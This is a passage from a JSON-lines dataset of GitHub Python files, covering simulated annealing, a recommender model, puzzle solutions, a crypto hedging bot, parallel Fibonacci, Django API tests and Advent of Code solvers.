voisin_fX = approximate_objective(voisin_X)\r\n # determine if we accept a (sometimes slightly worse) solution\r\n delta = voisin_fX - fX\r\n if (delta < 0) or (random() < math.exp(-delta/T)):\r\n X = voisin_X\r\n fX = approximate_objective(X)\r\n # check if the new solution have a dominance on something\r\n if X not in pareto_front:\r\n # list of all points dominated by the new one\r\n domine = []\r\n dominated = False\r\n for point in pareto_front:\r\n if dominance(X, point):\r\n domine.append(point)\r\n if dominance(point, X):\r\n dominated = True\r\n # if the new point was never dominated we add it to the pareto front\r\n if not dominated:\r\n pareto_front = clean(domine, pareto_front)\r\n pareto_front.append(X)\r\n archive_pareto.append(X)\r\n\r\n # update plot\r\n if graphical:\r\n # compute old pareto values\r\n abss = [sum(values[0][x] for x in point) for point in pareto_front]\r\n ordo = [sum(values[1][x] for x in point) for point in pareto_front]\r\n # we sort so they appear in an order nice to see\r\n # and the lines between each points are not a mess\r\n abss, ordo = [list(x) for x in zip(*sorted(zip(abss, ordo), key=itemgetter(0)))]\r\n # set the new limits of the window\r\n plt.xlim([0, 1.2 * max(abss)])\r\n plt.ylim([0, 1.2 * max(ordo)])\r\n # compute old pareto values\r\n old_abss = [sum(values[0][x] for x in point) for point in archive_pareto]\r\n old_ordo = [sum(values[1][x] for x in point) for point in archive_pareto]\r\n # plot new and old points\r\n line2.set_xdata(old_abss)\r\n line2.set_ydata(old_ordo)\r\n line1.set_xdata(abss)\r\n line1.set_ydata(ordo)\r\n # update the plot and take care of window events (like resizing etc.)\r\n fig.canvas.flush_events()\r\n # wait for next loop iteration\r\n time.sleep(0.01)\r\n\r\n # update temperature\r\n T *= alpha\r\n return pareto_front, fig, line1, line2\r\n\r\n\r\n\r\nfig, line1, line2 = None, None, None\r\nfor i, filename in enumerate(files):\r\n if one_window_by_solution:\r\n fig, line1, line2 = None, None, None\r\n print(\"file {0} of {1}\".format(i+1, len(files)))\r\n filename = os.path.join(directory, filename)\r\n objectives, objects, capacity, weights, values = read_file(filename)\r\n print(\"objectives\", objectives)\r\n print(\"objects\", objects)\r\n print(\"capacity\", capacity)\r\n print(\"values\", values)\r\n print(\"weights\", weights)\r\n pareto_front, fig, line1, line2 = annealing(objectives, objects, capacity, weights, values, fig, line1, line2)\r\n print(\"pareto front : \", str(pareto_front))\r\n\r\n\r\n\r\n\r\n","repo_name":"Chthi/Optimisation","sub_path":"multi_objective_annealing.py","file_name":"multi_objective_annealing.py","file_ext":"py","file_size_in_byte":8283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"13228104042","text":"from offline.data_preprocess import DataPreprocess\nfrom deepctr.feature_column import SparseFeat, VarLenSparseFeat, get_feature_names\nfrom deepctr.models.deepfm import FM\nimport tensorflow.keras as keras\n\nuser_num = 4691\nmovie_num = 2514\nyear_num = 76\ngenre_num = 9\n\nembedding_size = 16\nepoch = 5\nbatch_size = 512\n\ndata_process = DataPreprocess()\ntrain_dataset, test_dataset = data_process.generate_data(batch_size=batch_size, epoch=epoch)\n\nfeature_columns = [SparseFeat(\"user_id\", vocabulary_size=user_num, embedding_dim=embedding_size),\n SparseFeat(\"movie_id\", vocabulary_size=movie_num, embedding_dim=embedding_size),\n SparseFeat(\"current_label\", vocabulary_size=genre_num, 
embedding_dim=embedding_size),\n SparseFeat(\"release_year\", vocabulary_size=year_num, embedding_dim=embedding_size),\n ]\n\nfeature_columns += [VarLenSparseFeat(\n SparseFeat(\"user_recent_click_movie_ids\", vocabulary_size=movie_num, embedding_dim=embedding_size,\n embedding_name='movie_id'), maxlen=20),\n VarLenSparseFeat(\n SparseFeat(\"user_recent_click_labels\", vocabulary_size=genre_num, embedding_dim=embedding_size,\n embedding_name='current_label'), maxlen=20),\n VarLenSparseFeat(\n SparseFeat(\"user_like_genres\", vocabulary_size=genre_num, embedding_dim=embedding_size,\n embedding_name='current_label'), maxlen=2),\n]\n\ndnn_feature_columns = feature_columns\nlinear_feature_columns = feature_columns\n\nfeature_names = get_feature_names(linear_feature_columns + dnn_feature_columns)\n\nmodel = FM(linear_feature_columns, dnn_feature_columns, task='binary')\nmodel.summary()\nmodel.compile(optimizer=\"adam\", loss=keras.losses.binary_crossentropy, metrics=[\"accuracy\"])\n\nmodel.fit(train_dataset, epochs=epoch, steps_per_epoch=1270010 // batch_size + 1,\n validation_data=test_dataset, validation_steps=159256 // batch_size + 1,\n )\n","repo_name":"nicaibutou1993/ZimuRecSys","sub_path":"offline/rank/tasks/task_fm_by_deepctr.py","file_name":"task_fm_by_deepctr.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"72107191318","text":"import collections\n\nschedule = [(6, 8), (7, 10), (11, 12), (6, 7), (10, 12), (8, 10), (7, 8), (8, 9), (9, 12),\n (9, 10), (6, 12), (10, 11)]\n\n\n# solution 1\ndef find_best_time():\n schedule.sort()\n time_dict = []\n for i in schedule:\n # i[0] i[1] 의 차이만큼 dict에 1씩 추가. i[0] <= < i[1]\n for j in range(i[0], i[1]):\n time_dict.append(j)\n print('celebs\\' time ::', time_dict)\n cnt = collections.Counter(time_dict)\n print('end?', cnt) # Counter({9: 5, 7: 4, 8: 4, 10: 4, 11: 4, 6: 3})\n print('end?', cnt.most_common(1)) # [(9, 5)]\n print('best time to meet celebrities is', cnt.most_common(1)[0][0], 'o\\' clock') # 9\n\n\n# solution 2\ndef fine_best_time2():\n schedule.sort()\n time_dict = []\n index = 0\n while index < len(schedule):\n for i in range(schedule[index][0],\n schedule[index][1]):\n time_dict.append(i)\n index += 1\n answer = collections.Counter(time_dict).most_common(1)[0][0]\n print('best time to meet celebrities is', answer, 'o\\' clock')\n\n\n# find_best_time()\nfine_best_time2()\n","repo_name":"mand2/python-study","sub_path":"day03/p02.py","file_name":"p02.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"18651160346","text":"#In this version of \"Bot saves princess\", Princess Peach and bot's position are randomly set. 
Can you save the princess?\n\n#\n\ndef nextMove(n,r,c,grid):\n nn=n-1\n m=int(n/2)\n x=0\n xx=0\n yy=0\n\n notFound=True\n while(notFound):\n y=0\n while(y0):\n return(\"RIGHT\")\n \n \n elif(yy<0):\n return(\"UP\")\n elif(yy>0):\n return(\"DOWN\")\n\nn = int(input())\nr,c = [int(i) for i in input().strip().split()]\ngrid = []\nfor i in range(0, n):\n grid.append(input())\n\nprint(nextMove(n,r,c,grid))\n","repo_name":"cpamieta/547-202","sub_path":"Artificial Intelligence Exercise/Bot Building/Bot saves princess - 2.py","file_name":"Bot saves princess - 2.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"26123009167","text":"from asyncio import futures\r\nfrom asyncio.windows_events import NULL\r\nfrom decimal import Decimal\r\nfrom hashlib import new\r\nfrom unicodedata import decimal\r\nfrom web3 import Web3\r\nfrom status import WalletStatus, GateStatus\r\nfrom allocation import Allocation\r\nimport baseInfo as bi\r\nimport time\r\nimport multiprocessing as mp\r\nimport math\r\n\r\n\r\n'''\r\nundone note:\r\n0. send USDT to Gate or Wallet is undone!!!\r\n1.check cake balance and choose use ord balance\r\n2.rebalance function\r\n3.append addHedging function\r\n4.step 8 mp.Process\r\n5.gas check function\r\n'''\r\n\r\n# wallet,\r\n# prvkey, #alloctaion only\r\n# pid_ = 0, #walletStatus only\r\n# contractDice=[],\r\n# tokenDict={},\r\n# mainnet='https://bsc-dataseed3.binance.org/'\r\n\r\nwallet = bi.wallet\r\ngateWallet = bi.gateBepWallet\r\nprvkey = bi.prvkey\r\npid_ = 0\r\n\r\ncakePoolsContract = bi.contractDice['nomalCake']\r\ncakeSwapContract = bi.contractDice['swapToken']\r\nusdtContract = bi.contractDice['sendUSDT']\r\ngetPairContract = bi.contractDice['getPair']\r\n\r\ntokenDict = bi.tokenDict\r\nmainnet = bi.mainnet['bsc']\r\n\r\ngateStatus = GateStatus(bi.gateKey, bi.gateSecret)\r\nwalletStatus = WalletStatus(wallet, pid_, tokenDict, mainnet)\r\nallocation = Allocation(wallet, prvkey, walletStatus.getGasBalance(), tokenDict, mainnet)\r\n\r\ndef fromWei(wei,unit):\r\n return walletStatus.web3.fromWei(wei, unit)\r\n\r\ndef toWei(wei,unit):\r\n return walletStatus.web3.toWei(wei, unit)\r\ndef updateGasBalance():\r\n allocation.gasBalance = int(walletStatus.getGasBalance())\r\n\r\ndef totalBalanceInfo():\r\n gateSpotBalance = Decimal(gateStatus.getBalance('USDT','spot'))\r\n gateFuturesBalance = Decimal(gateStatus.getBalance('USDT','futures'))\r\n walletUSDTBalance = Decimal(fromWei(walletStatus.getTokenBalance('USDT'),'ether'))\r\n walletCAKEBalance = Decimal(fromWei(walletStatus.getTokenBalance('CAKE'),'ether'))\r\n walletGasBalance = Decimal(fromWei(walletStatus.getGasBalance(),'ether'))\r\n usingCake = walletStatus.getCakePools(cakePoolsContract)\r\n staked = Decimal(fromWei(usingCake['staked'],'ether'))\r\n pending = Decimal(fromWei(usingCake['pending'],'ether'))\r\n\r\n # print('Gate USDT balance: {},\\nwallet USDT balance: {},\\nstaked balance: {},\\npending balance: {},\\nfutures balance: {},\\nGas balance: {}'\\\r\n # .format(gateSpotBalance,walletUSDTBalance, staked,pending, gateFuturesBalance,walletGasBalance))\r\n\r\n return {'gateSpotBalance':gateSpotBalance,'walletUSDTBalance':walletUSDTBalance,'walletCAKEBalance':walletCAKEBalance,\r\n 'staked':staked,'pending':pending,'futuresBalance':gateFuturesBalance,'walletGasBalance':walletGasBalance}\r\n\r\ndef swapToken(tokenA,tokenB,amount,slip=0):\r\n #Swap token\r\n amountWei = toWei(amount,'ether')\r\n minWei = 
toWei(amount*slip,'ether')\r\n txnHash = allocation.swapToken(cakeSwapContract,wallet,tokenDict[tokenA][0],tokenDict[tokenB][0],amountWei,minWei)\r\n return txnHash\r\n\r\ndef buyGas(amount):\r\n usdtAmount = toWei(amount,'ether')\r\n txnHash = allocation.buyGas(cakeSwapContract,wallet,tokenDict['USDT'][0],tokenDict['BNB'][0],usdtAmount,0)\r\n return txnHash\r\n\r\n\r\ndef getTransactionReceipt(txnHash):\r\n waitingTimes = 0\r\n while True:\r\n # waiting for transaction receipt\r\n time.sleep(5)\r\n status = walletStatus.getTransactionReceipt(txnHash,waitingTimes)\r\n if status == None:\r\n print('waiting transaction...')\r\n waitingTimes += 1\r\n continue\r\n print('transaction done')\r\n return status\r\n\r\n\r\n\r\n'''\r\n1.get total balance\r\n2.set hedging balance\r\n3.balance USDT\r\n4.transfer USDT to Gate futures\r\n5.buy CAKE and sell CAKE_USDT at same time\r\n6.check CAKE balance and Gas balance\r\n7.stake cake in pools\r\n8.check two account balance\r\n/* for loop 8. */\r\nif futures balance lost 75% then rebalance\r\n'''\r\n\r\ndef newHedging( hedgingBalance:Decimal,cryptocurrency='CAKE'):\r\n # step 1 & 2\r\n totalBalance = totalBalanceInfo()\r\n updateGasBalance()\r\n available = (totalBalance['gateSpotBalance']+totalBalance['walletUSDTBalance'])\r\n if hedgingBalance > available:\r\n print('available balance is not enough.')\r\n return False\r\n halfBalance = Decimal(hedgingBalance/2)\r\n walletDiff = totalBalance['walletUSDTBalance'] - (halfBalance)\r\n ExDiff = totalBalance['gateSpotBalance'] - (halfBalance)\r\n # print(walletDiff,ExDiff)\r\n # step 3 \r\n if walletDiff < 0:\r\n # wallet balance not enough ,need transfer USDT to wallet\r\n # Gate to binance to wallet\r\n print('wallet USDT balance is not enough.')\r\n pass\r\n elif ExDiff < 0:\r\n # gate balance not enough ,need transfer USDT to gate\r\n print('Gate USDT balance is not enough.')\r\n pass\r\n \r\n #step 4\r\n isSuccess = gateStatus.transfers('USDT','spot','futures',halfBalance)\r\n if not isSuccess :\r\n print('Gate transfer fail.')\r\n return False\r\n print('transfer USDT to futures')\r\n #step 5 & 6\r\n # swap tokenA to tokenB\r\n txnHash = swapToken('USDT','CAKE',halfBalance)\r\n if txnHash == 'gas fail':\r\n print('gas balance is not enough.')\r\n return False\r\n updateGasBalance()\r\n print('swap hash: ',txnHash)\r\n # waiting for transaction receipt\r\n swapStatus = getTransactionReceipt(txnHash)\r\n if swapStatus['status'] == 0:\r\n print('Swap rejected.')\r\n isSuccess = gateStatus.transfers('USDT','futures','spot',halfBalance)\r\n if not isSuccess :\r\n print('Gate transfers back fail. 
please manual transfer balance')\r\n return False\r\n elif swapStatus['status'] == 1:\r\n print('Swap success')\r\n else:\r\n print('unkown error')\r\n return False\r\n # buy short CAKE_USDT\r\n futruesPrice = gateStatus.getFuturesPrice('CAKE_USDT')\r\n # choose market price or limit price (?\r\n size = halfBalance/Decimal(futruesPrice['mark_price'])\r\n size = math.floor(size*10)\r\n print('order size: ',-size)\r\n futuresOrder = gateStatus.orderFutures('CAKE_USDT',-size,0) # 0 is market price, limit price is futruesPrice['last_price']\r\n cake = walletStatus.getTokenBalance('CAKE')\r\n print('cake: {}\\nfutures: {}\\nGas: {}'.format(fromWei(cake,'ether'),gateStatus.getBalance(acc='futures'),walletStatus.getGasBalance()))\r\n\r\n #step 7\r\n gasPrice = 5\r\n while True:\r\n txnHash = allocation.cakeEnterStaking(cakePoolsContract,cake,gasPrice)\r\n if txnHash == 'gas fail':\r\n print('gas balance is not enough.')\r\n return False\r\n print('Staking hash: ',txnHash)\r\n stakeStatus = getTransactionReceipt(txnHash)\r\n if stakeStatus['status'] == 0:\r\n updateGasBalance()\r\n print('Staking rejected. boost gas try again gas price: '+gasPrice)\r\n if gasPrice >= 7 : \r\n print('Gas too high. quit staking ,please manual staking')\r\n return False\r\n gasPrice += 1\r\n continue\r\n elif stakeStatus['status'] == 1:\r\n print('staking success')\r\n break\r\n else:\r\n print('unkown error')\r\n return False\r\n return True\r\n\r\n#step 8 monitor balance, close true: liquidation, false: rebalance\r\n# use mp.Process(target = function, args = **args) make check function?\r\ndef monitor(close=True):\r\n while True:\r\n totalbalance = totalBalanceInfo()\r\n usingCAKE = totalbalance['staked']+totalbalance['pending']\r\n cakePrice = Decimal(gateStatus.getFuturesPrice('CAKE_USDT')['mark_price'])\r\n stakingUSDT = usingCAKE*cakePrice\r\n futuresUSDT = Decimal(totalbalance['futuresBalance'])\r\n liqPrice = Decimal(gateStatus.getLiqPrice('CAKE_USDT')['liq_price'])\r\n print('staking CAKE balance: {}\\nstaking USDT balance: {}\\nfutures USDT balance: {}\\nlast CAKE price: {}\\nliquidation price: {}\\ntotal balance: {}'\\\r\n .format(usingCAKE,stakingUSDT,futuresUSDT,cakePrice,liqPrice,stakingUSDT+futuresUSDT))\r\n if (cakePrice*Decimal(1.2)) > liqPrice:\r\n if close:\r\n #cancel function\r\n print('liquidation position')\r\n withdrawalHedging()\r\n else:\r\n #rebalance function\r\n print('rebalance')\r\n print('----'*10)\r\n time.sleep(5)\r\n\r\ndef withdrawalHedging(cryptocurrency='CAKE'):\r\n # withdrawal all balance\r\n stakedCake = walletStatus.getCakePools(cakePoolsContract)\r\n if stakedCake['staked'] != 0:\r\n txnHash = allocation.cakeLeaveStaking(cakePoolsContract,stakedCake['staked'])\r\n updateGasBalance()\r\n if txnHash == 'gas fail':\r\n print('gas balance is not enough.')\r\n return False\r\n print('leave hash: ',txnHash)\r\n leaveStatus = getTransactionReceipt(txnHash)\r\n if leaveStatus['status'] == 0:\r\n print('leaving rejected. 
please manual leaving')\r\n return False\r\n elif leaveStatus['status'] == 1:\r\n print('leaving success')\r\n time.sleep(5)\r\n else:\r\n print('unkown error')\r\n return False\r\n\r\n totalBalance = totalBalanceInfo()\r\n cake = totalBalance['walletCAKEBalance']\r\n print('leaving pools cake balance: ',cake)\r\n txnHash = swapToken('CAKE','USDT',cake)\r\n updateGasBalance()\r\n if txnHash == 'gas fail':\r\n print('gas balance is not enough.')\r\n return False\r\n print('swap hash: ',txnHash)\r\n swapStatus = getTransactionReceipt(txnHash)\r\n if swapStatus['status'] == 0:\r\n print('swap rejected. please manual swap or try again')\r\n return False\r\n elif swapStatus['status'] == 1:\r\n print('swap success')\r\n else:\r\n print('unkown error')\r\n return False\r\n\r\n totalBalance = totalBalanceInfo()\r\n liq = gateStatus.getLiqPrice()\r\n futuresOrder = gateStatus.orderFutures('CAKE_USDT',-liq['size'],0) # 0 is market price, limit price is futruesPrice['last_price']\r\n isSuccess = gateStatus.transfers('USDT','futures','spot',totalBalance['futuresBalance'])\r\n if not isSuccess :\r\n print('Gate transfer fail.please manual transfer balance')\r\n\r\n print('wallet CAKE balance: {}\\nwallet USDT balance: {}\\nGate.io futures balance: {}\\n Gate.io spot balance: {}\\norder status: {}'\\\r\n .format(totalBalance['walletCAKEBalance'],\r\n totalBalance['walletUSDTBalance'],\r\n totalBalance['futuresBalance'],\r\n totalBalance['gateSpotBalance'],\r\n futuresOrder['status']))\r\n\r\n\r\n\r\nmonitor()","repo_name":"eric0000567/crypto","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10542,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"28738670941","text":"from charm4py import charm, coro, Chare, Group\nimport time\nimport numba\n\n# Recursive Parallel Fibonacci\n# This example is meant to illustrate the use of charm.pool and nested\n# parallelism (creating parallel tasks from other parallel tasks).\n\n# NOTE that the grainsize is a critical parameter for performance. The fibonacci\n# number is calculated in a parallel recursive manner by spawning parallel\n# tasks until n <= GRAINSIZE, at which point fib(n) is calculated on the process\n# where the task is running using a sequential algorithm JIT-compiled with Numba.\n# - If GRAINSIZE is too low, *many* tasks will be spawned and you will pay the\n# cost of creating them, scheduling and communication.\n# - If GRAINSIZE is too high, you might not get a sufficient number of tasks to\n# achieve high parallel efficiency (this depends on how many cores you are\n# running on).\n\n\n@coro\ndef fib(n):\n if n <= GRAINSIZE:\n return fib_seq(n)\n else:\n # this will create two tasks which will be sent to distributed workers\n # (tasks can execute on any PE). 
map will block here for the result of\n # fib(n-1) and fib(n-2), which is why we mark fib as a coroutine\n return sum(charm.pool.map(fib, [n-1, n-2]))\n\n\n@numba.jit(nopython=True, cache=False) # numba really speeds up the computation\ndef fib_seq(n):\n if n < 2:\n return n\n else:\n return fib_seq(n-1) + fib_seq(n-2)\n\n\nclass Util(Chare):\n def compile(self):\n fib_seq(3)\n\n\ndef main(args):\n global GRAINSIZE\n print('\\nUsage: fib-numba.py [n] [grainsize]')\n n = 40\n if len(args) > 1:\n n = int(args[1])\n GRAINSIZE = n - 5\n if len(args) > 2:\n GRAINSIZE = int(args[2])\n GRAINSIZE = max(2, GRAINSIZE)\n # set GRAINSIZE as a global variable on all processes before starting\n charm.thisProxy.updateGlobals({'GRAINSIZE': GRAINSIZE}, awaitable=True).get()\n # precompile fib_seq on every process before the actual computation starts,\n # by calling the function. this helps get consistent benchmark results\n Group(Util).compile(awaitable=True).get()\n print('Calculating fibonacci of N=' + str(n) + ', grainsize=', GRAINSIZE)\n t0 = time.time()\n result = fib(n)\n print('Result is', result, 'elapsed=', round(time.time() - t0, 3))\n exit()\n\n\ncharm.start(main)\n","repo_name":"UIUC-PPL/charm4py","sub_path":"examples/fibonacci/fib-numba.py","file_name":"fib-numba.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","stars":281,"dataset":"github-code","pt":"85"} +{"seq_id":"24084075249","text":"import logging\nimport urllib.parse\n\nfrom django.contrib.gis.geos import Point\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase\n\n\n\nfrom cities.models import Country, Region, City\n\nlogger = logging.getLogger(__name__)\n\nregister_url = \"/auth/users/\"\nlogin_url = \"/auth/token/login/\"\nlogout_url = \"/auth/token/logout/\"\ntips_url = \"/tips/\"\ncities_url = \"/cities/\"\n\ndef get_tip_put_url(tip_id):\n return urllib.parse.urljoin(tips_url, str(tip_id), \"/\") + \"/\"\n\nclass TestUser:\n \"\"\"Defines auth information for a user.\n \"\"\"\n\n def __init__(self, username, email, password):\n self.username = username\n self.email = email\n self.password = password\n\n def register(self, client):\n data = {\n \"username\": self.username,\n \"email\": self.email,\n \"password\": self.password\n }\n return client.post(register_url, data, format=\"json\")\n\n def login(self, client):\n data = {\n \"username\": self.username,\n \"password\": self.password\n }\n response = client.post(login_url, data, format=\"json\")\n logger.debug(\"Login response: %s\", response)\n token = response.data[\"auth_token\"]\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n return response\n\n def logout(self, client):\n response = client.post(logout_url)\n client.credentials()\n return response\n\nclass AuthTests(APITestCase):\n\n def test_register_and_login(self):\n user = TestUser(\"titi\",\n \"titi@test.com\",\n \"pouetpouet\")\n response = user.register(self.client)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n response = user.login(self.client)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_logout(self):\n user = TestUser(\"toto\",\n \"toto@test.fr\",\n \"weshwesh\")\n user.register(self.client)\n user.login(self.client)\n response = user.logout(self.client)\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n\n\nclass TipTests(APITestCase):\n\n def test_get_default_empty(self):\n response = self.client.get(tips_url)\n self.assertEqual(response.status_code, 
status.HTTP_200_OK)\n self.assertEqual(len(response.data[\"results\"]), 0)\n\n def test_post_noauth(self):\n data = {\n \"title\": \"test\",\n \"text\": \"this is a test\",\n }\n response = self.client.post(tips_url, data)\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\nclass TipAuthenticatedTests(APITestCase):\n def setUp(self):\n country = Country(name=\"Empire anarchique du Bachibouzouc\",\n population=12000)\n country.save()\n region = Region(name=\"Province dépendante du Bazar\",\n country=country)\n region.save()\n city1 = City(name=\"Trifouillis les Oies\", region=region,\n country=country,\n location=Point(42, 127), population=42)\n city1.save()\n city2 = City(name=\"Montcuq\", region=region,\n country=country,\n location=Point(42, 127), population=127)\n city2.save()\n data = {\n \"username\": \"toto\",\n \"email\": \"toto@test.com\",\n \"password\": \"pouetpouet\"\n }\n response = self.client.post(register_url, data, format=\"json\")\n\n data = {\n \"username\": \"toto\",\n \"password\": \"pouetpouet\",\n }\n response = self.client.post(login_url, data, format=\"json\")\n token = response.data[\"auth_token\"]\n self.client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n def test_get_default_empty(self):\n response = self.client.get(tips_url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.data[\"results\"]), 0)\n\n def test_create_tip_no_location(self):\n tip_data = {\n \"title\": \"test no location\",\n \"text\": \"testing with no location\"\n }\n response = self.client.post(tips_url, tip_data, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n def test_create_local_tip(self):\n pos = Point(42, 127)\n data = {\n \"latitude\": pos.y,\n \"longitude\": pos.x\n }\n response = self.client.get(cities_url, data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n cities = response.data[\"results\"]\n test_city = cities[0]\n\n tip_data = {\n \"title\": \"test local\",\n \"text\": \"testing local\",\n \"cities\": [\n {\n \"id\": test_city[\"id\"],\n \"name\": test_city[\"name\"],\n }],\n \"regions\": [\n {\n \"id\": test_city[\"region\"][\"id\"],\n \"name\": test_city[\"region\"][\"name\"],\n }],\n \"countries\": [\n {\n \"id\": test_city[\"country\"][\"id\"],\n \"name\": test_city[\"country\"][\"name\"],\n }],\n }\n response = self.client.post(tips_url, tip_data, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n data = {\n \"latitude\": pos.y,\n \"longitude\": pos.x\n }\n response = self.client.get(tips_url, data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertTrue(response.data[\"results\"])\n test_tip = response.data[\"results\"][0]\n logger.debug(\"Tip: %s\", test_tip)\n self.assertEqual(test_tip[\"title\"], \"test local\")\n\n def test_create_tip_with_only_city(self):\n pos = Point(42, 127)\n data = {\n \"latitude\": pos.y,\n \"longitude\": pos.x\n }\n response = self.client.get(cities_url, data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n cities = response.data[\"results\"]\n test_city = cities[0]\n\n tip_data = {\n \"title\": \"test local\",\n \"text\": \"testing local\",\n \"cities\": [\n {\n \"id\": test_city[\"id\"],\n \"name\": test_city[\"name\"],\n }],\n \"regions\": [],\n \"countries\": [],\n }\n response = self.client.post(tips_url, tip_data, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n data = {\n \"latitude\": pos.y,\n 
\"longitude\": pos.x\n }\n response = self.client.get(tips_url, data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertTrue(response.data[\"results\"])\n test_tip = response.data[\"results\"][0]\n logger.debug(\"Tip: %s\", test_tip)\n self.assertEqual(test_tip[\"title\"], \"test local\")\n\n def test_create_tip_for_nearby_city(self):\n pos = Point(42, 127)\n data = {\n \"latitude\": pos.y,\n \"longitude\": pos.x\n }\n response = self.client.get(cities_url, data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n cities = response.data[\"results\"]\n test_city = cities[1]\n\n tip_data = {\n \"title\": \"test local\",\n \"text\": \"testing local\",\n \"cities\": [\n {\n \"id\": test_city[\"id\"],\n \"name\": test_city[\"name\"],\n }],\n \"regions\": [],\n \"countries\": [],\n }\n response = self.client.post(tips_url, tip_data, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n data = {\n \"latitude\": pos.y,\n \"longitude\": pos.x\n }\n response = self.client.get(tips_url, data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertTrue(response.data[\"results\"])\n test_tip = response.data[\"results\"][0]\n logger.debug(\"Tip: %s\", test_tip)\n self.assertEqual(test_tip[\"title\"], \"test local\")\n\n\n def test_update_tip(self):\n pos = Point(42, 127)\n data = {\n \"latitude\": pos.y,\n \"longitude\": pos.x\n }\n tip_data = {\n \"title\": \"test update\",\n \"text\": \"text before update\",\n }\n response = self.client.post(tips_url, tip_data, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n tip_id = response.data[\"id\"]\n\n response = self.client.get(tips_url, data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertTrue(response.data[\"results\"])\n\n tip = response.data[\"results\"][0]\n\n updated_text = \"Updated text\"\n tip[\"text\"] = updated_text\n\n tip_url = get_tip_put_url(tip_id)\n logger.debug(\"put tip url: %s\", tip_url)\n response = self.client.put(tip_url, tip, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n updated_tip_id = response.data[\"id\"]\n self.assertEqual(tip_id, updated_tip_id)\n self.assertEqual(response.data[\"text\"], updated_text)\n\n response = self.client.get(tip_url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data[\"text\"], updated_text)\n\n\nclass PermissionTests(APITestCase):\n \"\"\"Validate permissions.\n \"\"\"\n\n def setUp(self):\n self.user1 = TestUser(\"toto\", \"toto@test.com\", \"weshwesh\")\n self.user2 = TestUser(\"titi\", \"titi@test.com\", \"pouetpouet\")\n self.user1.register(self.client)\n self.user2.register(self.client)\n\n def test_tip_update(self):\n self.user1.login(self.client)\n tip_data = {\n \"title\": \"test auth\",\n \"text\": \"testing auth\"\n }\n response = self.client.post(tips_url, tip_data, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n tip_id = response.data[\"id\"]\n\n self.user1.logout(self.client)\n self.user2.login(self.client)\n tip_data = {\n \"title\": \"test update with other user\",\n \"text\": \"this should fail\"\n }\n tip_url = get_tip_put_url(tip_id)\n response = self.client.put(tip_url, tip_data, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)\n\n self.user2.logout(self.client)\n self.user1.login(self.client)\n tip_data = {\n \"title\": \"test update with correct user\",\n \"text\": \"this should 
succeed\"\n }\n tip_url = get_tip_put_url(tip_id)\n response = self.client.put(tip_url, tip_data, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n \n","repo_name":"paulez/localgreentips-backend","sub_path":"localgreentips/tips/tests/test_apis.py","file_name":"test_apis.py","file_ext":"py","file_size_in_byte":11070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"7963354472","text":"def majorityElement(nums: [int]) -> int:\n #摩尔投票算法,本质是每次丢弃一对不同数字,则如果有主元素,则主元素最后必定会剩下\n n, count = nums[0], 1\n for i in nums[1:]:\n if count == 0:\n n = i\n count = 1\n elif i == n:\n count += 1\n else:\n count -= 1\n count = 0\n for i in nums:\n if i == n:\n count += 1\n if count > len(nums)//2:\n return n\n else:\n return -1\n\nprint(majorityElement([3,3,4]))","repo_name":"plusevenWang/LeetCode","sub_path":"面试题 17.10. 主要元素.py","file_name":"面试题 17.10. 主要元素.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"42123949611","text":"#! /usr/bin/env python\n\n'''\nSolvers and example test cases for Day 14 of the Advent of Code 2021.\nProblem description: \n'''\n\nfrom collections import defaultdict\nfrom itertools import pairwise\nfrom typing import Dict, Iterable, List, Tuple\nimport unittest\n\n\ndef part1(lines: Iterable[str]) -> int:\n '''\n Solver for Day 14, part 1\n '''\n template_str, insertion_rules = read_input(lines)\n counts = element_count_after(10, list(template_str), insertion_rules)\n return counts[0][1] - counts[-1][1]\n\n\ndef part2(lines: Iterable[str]) -> int:\n '''\n Solver for Day 14, part 2\n '''\n template_str, insertion_rules = read_input(lines)\n counts = element_count_after(40, list(template_str), insertion_rules)\n return counts[0][1] - counts[-1][1]\n\n\ndef 